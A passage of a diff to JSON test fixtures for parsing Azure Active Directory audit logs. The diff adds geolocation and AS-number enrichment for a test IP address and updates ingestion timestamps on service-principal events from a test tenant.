lla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15542,6 +16526,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -15708,7 +16704,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125311600Z", + "ingested": "2021-12-14T14:48:43.176735870Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -15735,6 +16731,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -15901,7 +16909,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125318200Z", + "ingested": "2021-12-14T14:48:43.176736498Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -15928,6 +16936,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -16094,7 +17114,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125324600Z", + "ingested": "2021-12-14T14:48:43.176737155Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -16121,6 +17141,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -16287,7 +17319,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125330300Z", + "ingested": "2021-12-14T14:48:43.176737733Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 